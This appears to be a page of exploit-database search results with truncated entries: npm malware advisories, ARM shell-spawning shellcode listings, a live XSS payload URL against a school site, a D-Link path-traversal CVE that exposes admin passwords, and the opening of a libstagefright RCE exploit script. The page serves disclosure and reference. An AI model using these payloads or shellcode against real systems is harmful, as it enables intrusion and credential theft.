MAL-2024-1849 Malicious code in @ozon-shared-deps/bx-fe__video-player (npm)

--- -= Per source details. Do not edit below this line.=-...

MAL-2022-491 Malicious code in @ozon-bx/ui-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ea8b013bea85e5d9a6480bdd7473e162ac54beff6c15f4e81eab0a58ebae38e3 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Linux/ARM - execve (/bin/sh,NULL,0) Shellcode (31 bytes)

/ Title: Linux/ARM - execve"/bin/sh",NULL,0 - 31 bytes Date: 2010-08-31 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM without 0x20, 0x0a and 0x00 00008054 : 8054: e28f3001 add r3, pc, 1 ; 0x1 8058: e12fff13 bx r3 805c: 4678 mov r0, p...

bxscience.edu XSS vulnerability

Vulnerable URL: http://www.bxscience.edu/apps/news/shownews.jsp?RECID=159696=1=true=News%20Post%20May%20Parents%27%20Association%20Meeting%20-%20The%20Bronx%20High%20School%20of%20Science%3C/title%3E%3Csvg/onload=alert/XSSPOSED/%3E Details: Description| Value ---|--- Patched:| Yes, at 15.10.2017...

CVE-2017-12943

D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/showinfo.php?REQUIREFILE= absolute path traversal attack, as demonstrated by discovering the admin password...

CVE-2017-12943

CVE-2017-12943 affects D-Link DIR-600 Rev Bx devices with v2.x firmware. The vulnerability is an absolute path traversal in the endpoint model/__show_info.php?REQUIRE_FILE= which allows remote attackers to read passwords (admin credentials) from the device. Public mention in multiple sources (Exp...

PT-2017-12787 · D Link · Dir-600M

Name of the Vulnerable Software and Affected Versions: D-Link DIR-600 Rev Bx versions 2.x Description: The issue allows remote attackers to read passwords via an absolute path traversal attack using the "model/ show info.php?REQUIRE FILE=" endpoint. This can be exploited to discover the admin...

Android libstagefright - Integer Overflow Remote Code Execution

Exploit for Android platform in category remote exploits !/usr/bin/python2 import cherrypy import os import pwnlib.asm as asm import pwnlib.elf as elf import sys import struct with open'shellcode.bin', 'rb' as tmp: shellcode = tmp.read while lenshellcode % 4 != 0: shellcode += '\x00' heap groomin...

Google Android - libstagefright Integer Overflow Remote Code Execution

Google Android - libstagefright Integer Overflow Remote Code Execution !/usr/bin/python2 import cherrypy import os import pwnlib.asm as asm import pwnlib.elf as elf import sys import struct with open'shellcode.bin', 'rb' as tmp: shellcode = tmp.read while lenshellcode % 4 != 0: shellcode += '\x00...

Raspberry Pi Linux/ARM - execve"/bin/sh", 0, 0 vars 30 bytes

Raspberry Pi Linux/ARM - execve"/bin/sh", 0, 0 vars 30 bytes. Shellcode exploit for arm platform / Title: Linux/ARM - execve"/bin/sh", 0, 0 vars - 30 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov...

linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes

Exploit for linux/x86 platform in category shellcode ================================================================ linux/ARM - setuid0 & execve"/bin/sh","/bin/sh",0 - 38 bytes ================================================================ / Title: Linux/ARM - setuid0 &...